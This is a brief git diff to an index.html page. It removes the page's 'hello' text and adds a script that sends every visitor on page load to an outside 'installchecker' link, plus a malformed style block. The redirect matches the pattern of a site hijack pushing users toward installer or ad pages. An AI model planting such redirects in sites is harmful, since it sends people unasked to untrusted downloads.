--- a/index.html
+++ b/index.html
@@ -3,8 +3,14 @@
 <head>
   <meta charset="UTF-8">
   <title>Redirecting...</title>
+    <script>
+window.location.href="https://installchecker.com/cl/i/42n311" ;
+</script>
+  <style>
+    background-color: black;
+  </style>
 </head>
 <body>
-<p>hello</p>
+
 </body>
 </html>
